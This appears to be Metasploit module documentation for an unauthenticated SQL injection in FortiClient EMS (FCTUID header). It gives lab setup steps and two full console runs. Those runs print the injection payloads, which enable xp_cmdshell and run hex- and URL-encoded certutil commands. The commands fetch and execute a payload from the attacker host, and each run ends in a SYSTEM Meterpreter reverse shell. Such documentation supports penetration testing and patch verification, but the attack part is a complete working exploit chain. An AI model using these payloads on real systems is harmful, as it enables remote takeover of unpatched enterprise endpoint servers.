## Vulnerable Application
An SQLi injection vulnerability exists in FortiNet FortiClient EMS (Endpoint Management Server).
FortiClient EMS serves as an endpoint management solution tailored for enterprises, offering a centralized
platform for overseeing enrolled endpoints. The SQLi is vulnerability is due to user controller strings which
can be sent directly into database queries.

FcmDaemon.exe is the main service responsible for communicating with enrolled clients. By default it listens on port 8013
and communicates with FCTDas.exe which is responsible for translating requests and sending them to the database.
In the message header of a specific request sent between the two services, the FCTUID parameter is vulnerable
SQLi. The SQLi can used to enable the xp_cmdshell which can then be used to obtain unauthenticated remote code
execution in the context of NT AUTHORITY\SYSTEM

Affected versions of FortiClient EMS include:
 7.2.0 through 7.2.2
 7.0.1 through 7.0.10

Upgrading to either 7.2.3, 7.0.11 or above is recommended by FortiNet.

It should be noted that in order to be vulnerable, at least one endpoint needs to be enrolled / managed by FortiClient
EMS for the necessary vulnerable services to be available.

### Setup
You'll need two Windows hosts. One domain controller and one Windows 10 host (a domain controller might not be 100%
necessary however I used one and if you choose not to, your installation mileage may vary). The Windows 10 host will eventually
install the FortiClient EMS Client and will be managed by our FortiClient EMS Server to enable the services required
to exploit this vulnerability on the EMS Server. On the Windows 10 host set the the following Services to the following Startup Types:
 - Task Scheduler: Automatic
 - Windows Installer: Manual
 - Remote Registry: Automatic

Then either disable Windows Firewall completely or configure to allow the following inbound connections:
 - File and Printer Sharing (SMB-In)
 - Remote Scheduled Tasks Management (RPC)

Now on the domain controller download the installer `FortiClientEndpointManagementServer_7.0.7.0398_x64.exe`. You will need
a FortiNet account to request a free trial.

On the domain controller launch the installer. When it completes within the application you will be presented with a sign in page.
Enter username: "admin" with a blank password and click "Sign in" - this will prompt you to create a new password for the admin user.
Then authenticate with the new password.
A pop up window reading: "We didn't find any licenses for this EMS..." click "Try Free" and sign in with your FortiNet
account to request a free trial.

Once FortiClient EMS has been launched, in the left hand side select System Settings > EMS Settings, then under Shared
Settings select "Use FQDN" and input the domain controller's FQDN. Ensure the FQDN is accessible by pinging it from the cmdline.
A pop up window reading: "The server will need to restart..." click "Yes".

Scroll down to "EMS Settings". In the "FortiClient Download URL" replace the IP address with the domain controller's FQDN.
Click save.

Next select System Settings > FortiGuard Services under Cloud Services set the timezone your server is located in.
Click Save.

Under "Deployment & Installers" > "FortiClient Installer" on the right hand side select "Add". A pop up window will appear.

For "Installer Type" select "Choose an official release". For "Release", choose 7.0 and for "Patch" choose 7.0.7 , click next.
For "Name" input "FCT_707" click next.
Keep all the defaults for the Features section and click next.
Keep all the defaults for the Advanced section and click next and then click Finish.

Now you should have a Deployment Package with a Download Link. Navigate to that download link on your Windows 10 host
and download and install the .msi package. Once installed correctly you should see the Windows 10 host appear under the
"Endpoint" tab in the EMS Server. FortiClient EMS Server should now be exploitable.

## Verification Steps

1. Start msfconsole
1. Do: `use windows/http/forticlient_ems_fctid_sqli`
1. Set the `RHOST` and `LHOST` options
1. Run the module
1. Receive a Meterpreter session running in the context of `NT AUTHORITY\SYSTEM`

## Scenarios
### FortiClientEndpointManagementServer_7.0.7.0398_x64.exe running on Windows Server 2019 (Domain Controller)
```
msf exploit(windows/http/forticlient_ems_fctid_sqli) > set rhosts 172.16.199.200
rhosts => 172.16.199.200
msf exploit(windows/http/forticlient_ems_fctid_sqli) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf exploit(windows/http/forticlient_ems_fctid_sqli) > options

Module options (exploit/windows/http/forticlient_ems_fctid_sqli):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  172.16.199.200   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT   8013             yes       The target port (TCP)
   VHOST                    no        HTTP server virtual host


Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      FqgyHVSnYd       no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               172.16.199.1     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

msf exploit(windows/http/forticlient_ems_fctid_sqli) > set verbose true
verbose => true
msf exploit(windows/http/forticlient_ems_fctid_sqli) > run
[*] Reloading module...

[*] Command to run on remote host: certutil -urlcache -f http://172.16.199.1:8080/-LHoYC22ccefBZaLFchCEQ %TEMP%\pzGnmDqDGUOb.exe & start /B %TEMP%\pzGnmDqDGUOb.exe
[*] Fetch handler listening on 172.16.199.1:8080
[*] HTTP server started
[*] Adding resource /-LHoYC22ccefBZaLFchCEQ
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] 172.16.199.200:8013 - Running automatic check ("set AutoCheck false" to disable)
[*] 172.16.199.200:8013 - Sending the following message:
 MSG_HEADER: FCTUID=CBE8FC122B1A46D18C3541E1A8EFF7BD
SIZE=    124
X-FCCK-PROBE: PROBE_FEATURE_BITMAP0|1|
X-FCCK-PROBE-END


[*] 172.16.199.200:8013 - The response received was: FCPROBERPLY: FGT|FCTEMS0000125975:dc2.kerberos.issue|FEATURE_BITMAP|7|EMSVER|7000007|

[+] 172.16.199.200:8013 - The target appears to be vulnerable. Version detected: 7.0.7
[*] 172.16.199.200:8013 - Returning SYSINFO for 7.0 target
[*] 172.16.199.200:8013 - Sending the following message:
 MSG_HEADER: FCTUID=';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; DECLARE @SQL VARCHAR(128) = CONVERT(VARCHAR(MAX), 0X636572747574696c202d75726c6361636865202d6620687474703a2f2f3137322e31362e3139392e313a383038302f2d4c486f5943323263636566425a614c466368434551202554454d50255c707a476e6d44714447554f622e6578652026207374617274202f42202554454d50255c707a476e6d44714447554f622e657865); exec master.dbo.xp_cmdshell @sql;--
SIZE=     1900

X-FCCK-REGISTER: SYSINFO||QVZTSUdfVkVSPTEuMDAwMDAKUkVHX0tFWT1fCkVQX09OTkVUQ0hLU1VNPTAKQVZFTkdfVkVSPTYuMDAyNjYKREhDUF9TRVJWRVI9Tm9uZQpGQ1RPUz1XSU42NApWVUxTSUdfVkVSPTEuMDAwMDAKRkNUVkVSPTcuMC43LjA4NzkKQVBQU0lHX1ZFUj0xMy4wMDM2NApVU0VSPUFkbWluaXN0cmF0b3IKQVBQRU5HX1ZFUj00LjAwMDgyCkFWQUxTSUdfVkVSPTAuMDAwMDAKVlVMRU5HX1ZFUj0yLjAwMDMyCk9TVkVSPU1pY3Jvc29mdCBXaW5kb3dzIFNlcnZlciAyMDE5ICwgNjQtYml0IChidWlsZCAxNzc2MykKQ09NX01PREVMPVZNd2FyZSBWaXJ0dWFsIFBsYXRmb3JtClJTRU5HX1ZFUj0xLjAwMDIwCkFWX1BST1RFQ1RFRD0wCkFWQUxFTkdfVkVSPTAuMDAwMDAKUEVFUl9JUD0KRU5BQkxFRF9GRUFUVVJFX0JJVE1BUD00OQpFUF9PRkZORVRDSEtTVU09MApJTlNUQUxMRURfRkVBVFVSRV9CSVRNQVA9MTU4NTgzCkVQX0NIS1NVTT0wCkhJRERFTl9GRUFUVVJFX0JJVE1BUD0xNTU5NDMKRElTS0VOQz0KSE9TVE5BTUU9Q1lCRVItUkVUUUIxRkxQCkFWX1BST0RVQ1Q9CkZDVF9TTj1GQ1Q4MDAxNjM4ODQ4NjUxCklOU1RBTExVSUQ9QjRGNDQ1MEQtMTA4NS00RUIyLTkzMzItRkNCMDVFNzExRDE3Ck5XSUZTPUV0aGVybmV0MHwyMC4xNTQuOS40fGM0OmZjOjEyOmIzOjI3OmVmfDIxOS4xMDIuMzYuMjIwfGExOjhjOmJjOjBjOjJmOmE5fDF8KnwwClVUQz0xNzEwMjcxNzc0ClBDX0RPTUFJTj0KQ09NX01BTj1WTXdhcmUsIEluYy4KQ1BVPUludGVsKFIpIFhlb24oUikgU2lsdmVyIDQyMTUgQ1BVIEAgMi41MEdIegpNRU09MTIyODcKSEREPTk5CkNPTV9TTj1WTXdhcmUtNDIgMDQgZWQgMmQgNjQgZTggMGIgMTQtNDUgZTkgZTQgZjYgNWEgYzcgNjcgODIKRE9NQUlOPQpXT1JLR1JPVVA9V09SS0dST1VQClVTRVJfU0lEPVMtMS01LTIxLTMwLTUwLTAtNTAwCkdST1VQX1RBRz0KQURHVUlEPQpFUF9GR1RDSEtTVU09MApFUF9SVUxFQ0hLU1VNPTAKV0ZfRklMRVNDSEtTVU09MApFUF9BUFBDVFJMQ0hLU1VNPTAK

X-FCCK-REGISTER-END


[*] Client 172.16.199.200 requested /-LHoYC22ccefBZaLFchCEQ
[*] Sending payload to 172.16.199.200 (Microsoft-CryptoAPI/10.0)
[*] Client 172.16.199.200 requested /-LHoYC22ccefBZaLFchCEQ
[*] Sending payload to 172.16.199.200 (CertUtil URL Agent)
[*] Sending stage (201798 bytes) to 172.16.199.200
[*] 172.16.199.200:8013 - The response received was:
[+] 172.16.199.200:8013 - The SQLi: ';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; DECLARE @SQL VARCHAR(128) = CONVERT(VARCHAR(MAX), 0X636572747574696c202d75726c6361636865202d6620687474703a2f2f3137322e31362e3139392e313a383038302f2d4c486f5943323263636566425a614c466368434551202554454d50255c707a476e6d44714447554f622e6578652026207374617274202f42202554454d50255c707a476e6d44714447554f622e657865); exec master.dbo.xp_cmdshell @sql;-- was executed successfully
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.200:50409) at 2024-07-24 09:35:07 -0700

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DC2
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : KERBEROS
Logged On Users : 9
Meterpreter     : x64/windows
meterpreter >
```

### FortiClientEndpointManagementServer_7.2.2.0879_x64.exe running on Windows Server 2019 (Domain Controller)
```
msf exploit(windows/http/forticlient_ems_fctid_sqli) > set rhosts 172.16.199.200
rhosts => 172.16.199.200
msf exploit(windows/http/forticlient_ems_fctid_sqli) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf exploit(windows/http/forticlient_ems_fctid_sqli) > set verbose true
verbose => true
msf exploit(windows/http/forticlient_ems_fctid_sqli) > options

Module options (exploit/windows/http/forticlient_ems_fctid_sqli):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  172.16.199.200   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT   8013             yes       The target port (TCP)
   VHOST                    no        HTTP server virtual host


Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      rixdOwaGgW       no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               172.16.199.1     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

msf exploit(windows/http/forticlient_ems_fctid_sqli) > run

[*] Command to run on remote host: certutil -urlcache -f http://172.16.199.1:8080/-LHoYC22ccefBZaLFchCEQ %TEMP%\xqUdZSzoE.exe & start /B %TEMP%\xqUdZSzoE.exe
[*] Fetch handler listening on 172.16.199.1:8080
[*] HTTP server started
[*] Adding resource /-LHoYC22ccefBZaLFchCEQ
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] 172.16.199.200:8013 - Running automatic check ("set AutoCheck false" to disable)
[*] 172.16.199.200:8013 - Sending the following message:
 MSG_HEADER: FCTUID=CBE8FC122B1A46D18C3541E1A8EFF7BD
SIZE=    124
X-FCCK-PROBE: PROBE_FEATURE_BITMAP0|1|
X-FCCK-PROBE-END


[*] 172.16.199.200:8013 - The response received was: FCPROBERPLY: FGT|FCTEMS0000127184:dc2.kerberos.issue|FEATURE_BITMAP|7|EMSVER|7002002|PROTO_VERSION|1.0.0|PERCON|1|

[+] 172.16.199.200:8013 - The target appears to be vulnerable. Version detected: 7.2.2
[*] 172.16.199.200:8013 - Returning SYSINFO for 7.2 target
[*] 172.16.199.200:8013 - Sending the following message:
 MSG_HEADER: FCTUID=';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'POWERSHELL.EXE -COMMAND ""Add-Type -AssemblyName System.Web; CMD.EXE /C ([SYSTEM.WEB.HTTPUTILITY]::URLDECODE("""%63%65%72%74%75%74%69%6C%20%2D%75%72%6C%63%61%63%68%65%20%2D%66%20%68%74%74%70%3A%2F%2F%31%37%32%2E%31%36%2E%31%39%39%2E%31%3A%38%30%38%30%2F%2D%4C%48%6F%59%43%32%32%63%63%65%66%42%5A%61%4C%46%63%68%43%45%51%20%25%54%45%4D%50%25%5C%78%71%55%64%5A%53%7A%6F%45%2E%65%78%65%20%26%20%73%74%61%72%74%20%2F%42%20%25%54%45%4D%50%25%5C%78%71%55%64%5A%53%7A%6F%45%2E%65%78%65"""))""';--
IP=172.16.199.151
MAC=00-0c-29-51-f7-4d
FCT_ONNET=0
CAPS=131071
VDOM=Default
EC_QUARANTINED=0
SIZE=     2259

X-FCCK-REGISTER:SYSINFO|RkNUT1M9V0lONjQKT1NWRVI9TWljcm9zb2Z0IFdpbmRvd3MgMTAgUHJvZmVzc2lvbmFsIEVkaXRpb24sIDY0LWJpdCAoYnVpbGQgMTkwNDUpClJTRU5HX1ZFUj0xLjAwMTgyCkNPTV9NT0RFTD1WTXdhcmU3LDEKQVZTSUdfVkVSPTEuMDAwMDAKVVRDPTE3MjE3NTY2MjYKUENfRE9NQUlOPWtlcmJlcm9zLmlzc3VlCkNPTV9NQU49Vk13YXJlLCBJbmMuCkNQVT1JbnRlbChSKSBDb3JlKFRNKSBpNy05NzUwSCBDUFUgQCAyLjYwR0h6CkNPTV9TTj1WTXdhcmUtNTYgNGQgOGEgZDUgN2IgMzkgM2IgMGQtMzMgYzYgMjUgNmEgZTQgNTEgZjcgNGQKREhDUF9TRVJWRVI9Tm9uZQpGQ1RWRVI9Ny4yLjIuMDg2NApFUF9PTk5FVENIS1NVTT0wCkFWRU5HX1ZFUj02LjAwMjg3CkFQUFNJR19WRVI9MjguMDA4MzEKVVNFUj1tc2Z1c2VyCkFQUEVOR19WRVI9NC4wMDA4MgpWVUxTSUdfVkVSPTEuMDA3MDgKQVZBTFNJR19WRVI9MC4wMDAwMApWVUxFTkdfVkVSPTIuMDAwMzcKQVZfUFJPVEVDVEVEPTEKQVZBTEVOR19WRVI9MC4wMDAwMApQRUVSX0lQPTE2Mi4xNTYuNTguMTk5CkVOQUJMRURfRkVBVFVSRV9CSVRNQVA9MTYKRVBfT0ZGTkVUQ0hLU1VNPTAKSU5TVEFMTEVEX0ZFQVRVUkVfQklUTUFQPTQyMDcyNwpFUF9DSEtTVU09MApISURERU5fRkVBVFVSRV9CSVRNQVA9NDE4MDg3CkdST1VQX1RBRz0KRU5BQkxFRF9BUFBTPTAKSU5TVEFMTEVEX0FQUFM9MApESVNLRU5DPQpIT1NUTkFNRT1jbGllbnQKQVZfUFJPRFVDVD1NaWNyb3NvZnQgRGVmZW5kZXIgQW50aXZpcnVzCkZDVF9TTj1GQ1Q4MDAzMTczNjg5NzMwCklOU1RBTExVSUQ9RjQxNkU5QjctQzAxQy00M0RFLTk1RjEtMkJGQ0FEOTAzNTFECk5XSUZTPUV0aGVybmV0MHwxNzIuMTYuMTk5LjE1MXwwMC0wYy0yOS01MS1mNy00ZHwxNzIuMTYuMTk5LjJ8MDAtNTAtNTYtZTgtMDgtNmF8MXwqfDAKTUVNPTE2MzgzCkhERD0xMTkKRE9NQUlOPQpXT1JLR1JPVVA9ClVTRVJfU0lEPVMtMS01LTIxLTE3NjAyNTQxOTEtMzcyMzY0MzQyLTMyNDQ0NTM2ODctMTAwMApBREdVSUQ9CkVQX0ZHVENIS1NVTT0wCkVQX1JVTEVDSEtTVU09MApXRl9GSUxFU0NIS1NVTT0wCkVQX0FQUENUUkxDSEtTVU09MAo=|

X-FCCK-REGISTER-END


[*] Client 172.16.199.200 requested /-LHoYC22ccefBZaLFchCEQ
[*] Sending payload to 172.16.199.200 (Microsoft-CryptoAPI/10.0)
[*] Client 172.16.199.200 requested /-LHoYC22ccefBZaLFchCEQ
[*] Sending payload to 172.16.199.200 (CertUtil URL Agent)
[*] Sending stage (201798 bytes) to 172.16.199.200
[*] 172.16.199.200:8013 - The response received was:
[+] 172.16.199.200:8013 - The SQLi: ';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'POWERSHELL.EXE -COMMAND ""Add-Type -AssemblyName System.Web; CMD.EXE /C ([SYSTEM.WEB.HTTPUTILITY]::URLDECODE("""%63%65%72%74%75%74%69%6C%20%2D%75%72%6C%63%61%63%68%65%20%2D%66%20%68%74%74%70%3A%2F%2F%31%37%32%2E%31%36%2E%31%39%39%2E%31%3A%38%30%38%30%2F%2D%4C%48%6F%59%43%32%32%63%63%65%66%42%5A%61%4C%46%63%68%43%45%51%20%25%54%45%4D%50%25%5C%78%71%55%64%5A%53%7A%6F%45%2E%65%78%65%20%26%20%73%74%61%72%74%20%2F%42%20%25%54%45%4D%50%25%5C%78%71%55%64%5A%53%7A%6F%45%2E%65%78%65"""))""';-- was executed successfully
[*] Meterpreter session 4 opened (172.16.199.1:4444 -> 172.16.199.200:28146) at 2024-07-23 16:17:56 -0700

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DC2
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : KERBEROS
Logged On Users : 9
Meterpreter     : x64/windows
meterpreter >
```
